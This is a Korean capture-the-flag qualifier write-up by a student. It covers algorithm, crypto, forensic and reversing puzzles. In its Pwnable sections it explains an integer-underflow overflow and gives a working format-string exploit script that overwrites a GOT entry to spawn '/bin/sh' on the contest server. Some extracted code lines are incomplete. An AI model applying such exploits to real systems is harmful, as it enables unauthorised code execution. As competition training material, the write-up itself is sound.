2016 순천향대학교정보보호페스티벌 예선풀이 이름 : 이태양학교 : 한국디지털미디어고등학교아이디 : tylee0208 닉네임 : 5unKn0wn 자기점수 : 1300 등수 : 3

Similar documents
Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint - chap13-입출력라이브러리.pptx

Microsoft PowerPoint - Java7.pptx

비트와바이트 비트와바이트 비트 (Bit) : 2진수값하나 (0 또는 1) 를저장할수있는최소메모리공간 1비트 2비트 3비트... n비트 2^1 = 2개 2^2 = 4개 2^3 = 8개... 2^n 개 1 바이트는 8 비트 2 2

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074>

Microsoft PowerPoint - chap10-함수의활용.pptx

Microsoft PowerPoint - chap03-변수와데이터형.pptx

C 언어 프로그래밊 과제 풀이

중간고사

금오공대 컴퓨터공학전공 강의자료

untitled

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

PowerPoint 프레젠테이션

목차 포인터의개요 배열과포인터 포인터의구조 실무응용예제 C 2

[ 마이크로프로세서 1] 2 주차 3 차시. 포인터와구조체 2 주차 3 차시포인터와구조체 학습목표 1. C 언어에서가장어려운포인터와구조체를설명할수있다. 2. Call By Value 와 Call By Reference 를구분할수있다. 학습내용 1 : 함수 (Functi

임베디드시스템설계강의자료 6 system call 2/2 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과

0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x = (12 + 6) / 2 * 3; x = 27 x = 3 * (8 / 4

Microsoft PowerPoint - chap11-포인터의활용.pptx

PowerPoint 프레젠테이션

슬라이드 1

untitled

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070>

Microsoft PowerPoint - chap06-2pointer.ppt

untitled

Microsoft PowerPoint - chap06-1Array.ppt

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -


Microsoft PowerPoint - chap05-제어문.pptx

K&R2 Reference Manual 번역본

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C4C656D70656C2D5A69762E637070>

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습

BMP 파일 처리

Microsoft PowerPoint - chap12-고급기능.pptx

금오공대 컴퓨터공학전공 강의자료

JAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각

02장.배열과 클래스

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona

PowerPoint Template

컴파일러

제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다.

PowerPoint Presentation

Microsoft PowerPoint - ch07 - 포인터 pm0415

<322EBCF8C8AF28BFACBDC0B9AEC1A6292E687770>

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

11장 포인터

제 11 장포인터 유준범 (JUNBEOM YOO) Ver 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다.

PowerPoint 프레젠테이션

OCW_C언어 기초

Data Structure

PowerPoint 프레젠테이션

歯9장.PDF

PowerPoint 프레젠테이션

Chapter_06

학습목차 2.1 다차원배열이란 차원배열의주소와값의참조

2015 개정교육과정에따른정보과평가기준개발연구 연구책임자 공동연구자 연구협력관

Infinity(∞) Strategy

슬라이드 1

Microsoft PowerPoint - chap-11.pptx

: 1 int arr[9]; int n, i; printf(" : "); scanf("%d", &n); : : for(i=1; i<10; i++) arr[i-1] = n * i; for(i=0; i<9; i++) if(i%2 == 1) print

PowerPoint 프레젠테이션

The Pocket Guide to TCP/IP Sockets: C Version

Microsoft PowerPoint - Chapter_08.pptx


17장 클래스와 메소드

C++-¿Ïº®Çؼ³10Àå

PowerPoint 프레젠테이션

프로그램을 학교 등지에서 조금이라도 배운 사람들을 위한 프로그래밍 노트 입니다. 저 역시 그 사람들 중 하나 입니다. 중고등학교 시절 학교 도서관, 새로 생긴 시립 도서관 등을 다니며 책을 보 고 정리하며 어느정도 독학으르 공부하긴 했지만, 자주 안하다 보면 금방 잊어

Microsoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx

설계란 무엇인가?

Microsoft PowerPoint - chap11.ppt [호환 모드]

프로그래밍개론및실습 2015 년 2 학기프로그래밍개론및실습과목으로본내용은강의교재인생능출판사, 두근두근 C 언어수업, 천인국지음을발췌수정하였음

8장 문자열

A Hierarchical Approach to Interactive Motion Editing for Human-like Figures

윤성우의 열혈 TCP/IP 소켓 프로그래밍

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770>

이번장에서학습할내용 동적메모리란? malloc() 와 calloc() 연결리스트 파일을이용하면보다많은데이터를유용하고지속적으로사용및관리할수있습니다. 2

Microsoft PowerPoint - chap-03.pptx

<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>

Microsoft PowerPoint - ch09 - 연결형리스트, Stack, Queue와 응용 pm0100

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CC0E7B0EDB0FCB8AE5C53746F636B5F4D616E D656E74732E637070>

설계란 무엇인가?

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

11장 포인터

PowerPoint Presentation

C 프로그래밊 개요

Microsoft PowerPoint - Lesson2.pptx

A Dynamic Grid Services Deployment Mechanism for On-Demand Resource Provisioning

PowerPoint 프레젠테이션

PowerPoint Presentation

제15회순천향대학교청소년정보보호페스티벌 (15th Youth Information Security Festival) 문제풀이보고서 한국디지털미디어고등학교 3 학년이름: 이태양 ( 뮤쀼)

Microsoft PowerPoint - additional01.ppt [호환 모드]

Microsoft PowerPoint - es-arduino-lecture-03

Chapter 4. LISTS

OCW_C언어 기초

Microsoft PowerPoint - CSharp-10-예외처리

설계란 무엇인가?

1장. 유닉스 시스템 프로그래밍 개요

PowerPoint 프레젠테이션

Transcription:

2016 순천향대학교정보보호페스티벌 예선풀이 이름 : 이태양학교 : 한국디지털미디어고등학교아이디 : tylee0208 닉네임 : 5unKn0wn 자기점수 : 1300 등수 : 3

Warm Up Key : 48_3_5_5 Algorithm 50 문제설명은장황하게되어있는데결론적으로는주어진두수의최대공약수를구하라는의미입니 다. 파이썬의 fractions 모듈에있는 gcd 함수를사용하였습니다. import fractions n = input() for i in range(n): num = [int(i) for i in raw_input().split(' ')] print fractions.gcd(num[0], num[1]) Key : aab949b4197553ad6ef579f88829334b4db965ba61d13a6f9d7 211a053623191ce71bf5e0228610147cfd4ee4173f2cc5bdc104470df 21855c4e004b3472858a

Algorithm 100 Run Length Encoding 을구현하는문제입니다. 문자열압축은파이썬의 itertools 모듈을이용하였 고압축해제는직접반복문을돌면서구현하였습니다. 압축과관련된코드는검색을통해알아 냈습니다. from itertools import * def encode(inputstr): encoded = [(len(list(group)),name) for name, group in groupby(inputstr)] string = '' for i in encoded: if i[0] < 5: string += i[1] * i[0] else: string += '(' + i[1] + str(i[0]) + ')' return string def decode(inputstr): string = '' leng = '' for j in range(len(inputstr)): if inputstr[j] == '(': char = inputstr[j + 1] elif ord('0') <= ord(inputstr[j]) and ord('9') >= ord(inputstr[j]): leng += inputstr[j] elif inputstr[j] == ')': string += char * (int(leng) - 1) leng = '' else: string += inputstr[j] return string n = input() for i in range(n): mode = input() inputstr = raw_input() if mode == 0: print encode(inputstr) else: print decode(inputstr)

Key : 0012a73d2d317ec7155fe2c2e19b9e887b092f5c5237b65b96b 09d9f6987b2cfb7845d0abee8762aeedb518ae7ec26742b1a27267f5 5db7145f7acc2450e59b9 Algorithm 200 약수의개수를최대한효율적으로구해야하는문제입니다. 에라토스테네스의체와소인수분해를 이용하여해결할수있습니다. 그리고과거정보올림피아드에비슷한문제가있었기에참고하여 풀었습니다. #include <stdio.h> #include <math.h> #define MAX 1000 * 1000 * 10 + 1 int minfactor[max]; int minfactorpower[max]; int factors[max]; void eratosthenes() { minfactor[0] = minfactor[1] = -1; for (int i = 2; i < MAX; i++) minfactor[i] = i; int sqrtn = int(sqrt(max)); for (int i = 2; i < sqrtn; i++) { if (minfactor[i] == i) { for (int j = i * i; j < MAX; j += i) { if (minfactor[j] == j) minfactor[j] = i; void getfactors() { factors[1] = 1; for (int n = 2; n < MAX; n++) { if (minfactor[n] == n) { minfactorpower[n] = 1; factors[n] = 2; else {

int p = minfactor[n]; int m = n / p; if (p!= minfactor[m]) minfactorpower[n] = 1; else minfactorpower[n] = minfactorpower[m] + 1; int a = minfactorpower[n]; factors[n] = (factors[m] / a) * (a + 1); int main(void) { int num, k, sn, ln, ans = 0; eratosthenes(); getfactors(); scanf("%d", &num); for (int i = 0; i < num; i++) { ans = 0; scanf("%d %d %d", &k, &sn, &ln); for (int j = sn; j <= ln; j++) { if (factors[j] == k) ans++; printf("%d\n", ans); return 0; Key :8d08bbeceba83531e32fb0b013be7eb5ff421e422b0bbff0e9c5 bd11bf861aeda55dfbda61bafd36023f43e76f07c29331e080c43d1d3 5013dac082153b6078c Crypto 50 소괄호가분침과시침의최대공약수이고대괄호가최소공배수라는힌트를듣고풀었습니다. 암호 문은 EKALDMSPRLMZHNTDUZTASCEDMZHNTDUZTAHCWRL 이고, 첫번째키는 11 과 33 의최대 공약수인 11, 두번째키는 12 와 4 의최소공배수인 12 입니다. 그리고암호방식은덧셈암호와

곱셈암호를합친아핀암호 (Affine cipher) 입니다. 곱셈암호의키는 11, 덧셈암호의키를 12 로 하여암호문을복호화해주면키값을얻을수있습니다. Key : EOGHLAKFRHANJTDLWNDGKSELANJTDLWNDGJSIRH Forensic 50 파일헥스값을보았을때시그니쳐가 ADSEGMENTEDFILE 이므로확장자를.ad1로바꿔주고 FTK Imager로열어줍니다. 처음에는파일을삭제했다는부분에초점을두어삭제한기록이나로그를중심으로찾아보다가추후에힌트로 Google Drive가나오고나서파일업로드로그를중심으로살펴보았습니다. 그리고 C:\Users\Administrator\AppData\Local\Google\Drive\user_default에있는 sync_log.log라는파일을추출하여로그를보았습니다. 기밀문서니까.hwp,.docx 등의확장자를이용하여검색하다가.docx 라는확장자를가진

T0pS2cret.docx 라는파일을업로드한로그를찾을수있었습니다. 로그에서파일이름과날짜, 시간까지모두알수있었습니다. Key : T0pS2cret.docx_20160706163702 Misc 50 먼저 base64 로디코딩을하고의도를파악하지못하고있다가두번째힌트가나왔을때문자열 사이사이에끼어있는숫자의의미를깨달을수있었습니다. 문자열중간의숫자는문자열내에서 의인덱스역할을하고있었습니다. 숫자가가리키는문자들을모두모으면키가나옵니다. 주어진인덱스에서 1 을빼주는이유는문자열의첫시작을 0 으로했기때문입니다.

Key : 9ood_Luck!_4_@//_solved! Pwnable 50 인티저언더플로우를활용한문제입니다. 값을입력받아다른버퍼에복사한후입력받은값과 복사한값이다르다면플래그를출력해줍니다. 값을 128 바이트만큼입력할수있고리턴할때개행문자를제외한입력한글자수를리턴해줍 니다. 그리고 직접구현한메모리복사함수에서인자로넘어온사이즈의 -1만큼복사하는데이값을저장하는변수가 unsigned이기때문에 0이넘어왔을시 255바이트를복사하게되고오버플로우가일어나게됩니다. 복사될버퍼는입력받은버퍼보다위에있기때문에오버플로우가나서복사될시입력받은버퍼를침범하게되고따라서두값이다르게되므로플래그를얻을수있습니다.

입력을받을때는입력받은데이터가 0 바이트라면다시입력받게하지만반복문을 10 번까지만 돌기때문에 nc 에접속하고 10 번만아무값도입력하지않으면됩니다. Key : Do you w@nt to expl0it a b1n@ry~? :D Pwnable 100 지뢰찾기게임을기반으로한포맷스트링이들어있는문제입니다. Rank 를출력해줄때포맷스트 링버그가일어납니다.

그리고포맷스트링이일어날때출력하는문자열은우리가지뢰찾기게임을이겼을때넣는이름 입니다. 이외에도포맷스트링말고지뢰찾기게임알고리즘에도몇가지문제가있었습니다.

지뢰를다찾았는지비교하는전역변수를초기화해주는구간이없기때문에게임을한번만이 기면그후에는게임을하지않아도게임을이겼을때처럼포맷스트링에들어갈문자열을바꿔줄 수있습니다. 그리고 지뢰를마킹할때한번마킹했던지뢰인지체크하는구간이존재하지않기때문에한좌표를잡 아브루트포싱을돌리거나지뢰위치를한군데만알면게임에서쉽게승리할수있게됩니다. 그후포맷스트링에서 printf got 주소를 system plt 주소로덮고게임을한번더해서이름으로 /bin/sh 를넣어주면 rank 를출력할때 system( /bin/sh ) 가실행되어쉘을획득할수있게됩니다. from SunKn0wn import * def main(): r = remote('112.166.114.136', 38961) r.sendline('1') r.sendline('1') while 1: r.sendline('1') r.sendline('2 3') recv = if "Clearrrrrrrrrrrrrrrrr!!" in recv: break if "Failed..." in recv:

r.close() return -1 r.sendline('aaaa\x10\xc0\x04\x08aaaa\x12\xc0\x04\x08%08x%08x%34160c%hn% 33396c%hn') r.sendline('2') r.sendline('1') r.sendline('1') r.sendline('/bin/sh\x00') r.sendline('2') print "[*] Shell" r.interactive() while 1: if main() == -1: continue else: break 익스플로잇코드입니다. 지뢰위치는임의적으로 (2, 3) 에있을것이라예상하고그위치를다섯 번마킹하게했으며만약아니라면처음부터다시시도하게했습니다. Key : Do you w@nt to expl0it a b1n@ry~? :D Reversing 50 처음실행했을때의모습은

36 개의버튼이있지만눌러도아무런반응이없습니다. 내부에서는 36개의케이스문을이용하여각버튼에대한핸들러를호출해주며함수내부에서는각각의연산이일어납니다. 그런데여기서어디에도플래그를출력해준다거나버튼을잘눌렀다거나하는등의반응이없었기에무엇을해야할지고민하다가각함수마다리턴해주는값이각각다른것을보고이순서대로함수를호출하면플래그가생성되어있을것이라생각했습니다. 그후디버깅을하면서각리턴값을가져와정렬한후순서대로해당함수를호출해주었고연산결과로플래그가생성되어있었습니다. 다만리턴값중 20번이나오지않는오류가있는데이값은게싱으로 0번으로나온함수를 20번으로설정하고풀었더니정상적으로플래그가생성되었습니다. 그렇게게싱한이유는리턴값이 0번부터 36번까지나왔는데이러면 37개의경우의수가생깁니다. 하지만실제버튼은 36개이므로제일작은값인 0번을 20번으로설정해보았고플래그가잘나왔습니다. 따라서눌러야하는버튼의순서는 25 33 3 15 35 6 20 31 27 0 8 21 2 30 13 18 9 5 24 34 14 19 11 7 28 4 16 26 32 23 17 10 1 29 12 22 이렇게됩니다. 디버깅하면서순서대로함수를호출해주면 키가들어있습니다. Key : thi5_1s_nem0~!

Reversing 100 이번에는 C# 실행파일과 decrypted라는파일이주어집니다. 실행파일은 C# 이므로 Reflector를이용해디컴파일해서소스를분석했습니다. 간단하게하는역할은바탕화면에 iampicture.bmp라는파일이있다면암호화하고 decrypted로이름을변경시키고 warning 이라는사진만계속띄어둡니다. 함께주어진 decrypted 파일을암호화되기전의사진상태로복호화한다면키가적혀있을것입 니다.. 프로그램구조는 Main과 8개의메소드로이루어져있습니다. 각메소드는각각의암호화연산을수행합니다. 연산은여러가지테이블과함께이루어지며주로 ^, +, - 연산을이용하기때문에역연산이가능합니다. 연산메소드들을모두분석하고필요없는부분들은제거한후코드를최적화하며역연산소스를짜서 decrypted파일을복호화했습니다. def a_re(yu, alp, n): yu[0] = yu[0] ^ alp yu[3] = yu[3] + n[5]

return yu def b_re(yu, alp, length): alp -= 1 for i in range(length): if alp > ord('='): alp = ord('a') while alp < ord('d'): if alp % 2 == 0: yu[i] ^= alp else: yu[i] ^= (length & 0xff) alp += 1 return yu def c_re(yu, bytes, length): index = 5 bytes = [ord(i) for i in '\x00'.join(bytes)] # convert to unicode for i in range(length): if index > 7: yu[i] = (yu[i] + bytes[i % 14]) & 0xff yu[i] ^= bytes[index] else: yu[i] = (yu[i] + bytes[index]) & 0xff index += 1 return yu def e_re(q, length, ee): i = 0 while i < length: if i % 2 == 0: q[i] ^= ee[i % 10] ee[i % 10] = (ee[i % 10] + 1) & 0xff else: q[i] = (q[i] + ee[i % 10]) & 0xff

i += 1 return q def f_re(yu, arr4, length, arr): num = 0 for i in range(length): if i % 3 == 0: yu[i] = (yu[i] + arr[num % 10]) & 0xff yu[i] = (yu[i] - arr4[i % 14]) & 0xff num += 1 elif i % 3 == 1: yu[i] = (yu[i] + arr[i % 4]) & 0xff yu[i] ^= arr[i % 10] else: yu[i] = (yu[i] - num) & 0xff arr[num % 10] ^= arr4[num % 14] arr[num % 10] = (arr[num % 10] - 1) & 0xff return yu def u_re(yu, arr4, il): for num in range(len(yu)): yu[num] = (yu[num] + il[num % 14]) & 0xff il[num % 14] ^= arr4[num % 14] return yu arr = [0x74, 0x59, 0x25, 0x32, 0x77, 0x62, 0x4c, 0x7e, 0x42, 0x63] n = [0x6e, 0x23, 0x48, 0x7a, 0x73, 0x30, 0x52, 0x86, 0x2e, 0x71, 0x57, 0x6a, 0x26, 0x65] il = [0x69, 0x61, 0x6d, 0x70, 0x69, 0x63, 0x74, 0x75, 0x72, 0x65, 0x2e, 0x62, 0x6d, 0x70] charray2_ori = [0x75, 0x35, 0x44, 0x48, 0x2a, 0x6b, 0x43, 0x40, 0x6f, 0x72] charray2 = [0xdd, 0xa4, 0x6a, 0x82, 0x17, 0xeb, 0xef, 0x65, 0x2e, 0xcf] filename = 'decrypted' destfilename = 'iampicture.bmp' with open(filename, 'rb') as f: readed = list(f.read()[:-0x81]) yu = [ord(i) for i in readed] length = len(yu)

yu = u_re(yu, n, il) yu = e_re(yu, length, charray2) yu = c_re(yu, filename, length) yu = b_re(yu, arr[8], length) yu = f_re(yu, n, length, charray2_ori) yu = a_re(yu, arr[4], n) with open(destfilename, 'wb') as f: f.write(''.join(chr(i) for i in yu)) 역연산소스입니다. decrypted파일을두고저소스를컴파일해서실행하면원본 iampicture.bmp 가복구됩니다. 복구된사진은 이렇게생겼습니다. Key : Crypto_is_BAD

수고많으셨습니다. 풀이보고서는 yisf.sch@gmail.com 으로보내주시면됩니다.

2024 © docsplayer.org 개인정보보호 | 약관 | 지원